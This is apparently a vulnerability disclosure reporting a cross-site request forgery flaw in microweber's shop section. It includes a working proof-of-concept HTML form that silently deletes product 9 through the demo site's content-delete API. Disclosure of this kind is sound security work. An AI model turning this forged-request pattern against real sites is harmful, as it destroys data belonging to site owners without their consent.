Cross-Site Request Forgery (CSRF) in microweber/microweber
Jul 30th 2021
Attacker able to delete any Product in My shop section if attacker knows the
ids parameter value.
🕵️♂️ Proof of Concept
Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the Product with id 9 has been deleted.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.microweber.org/demo/api/content/delete" method="POST"> <input type="hidden" name="ids" value="9" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Here a Product with value 9 will be deleted after clicking on submit button. 📍 Location app.js#L1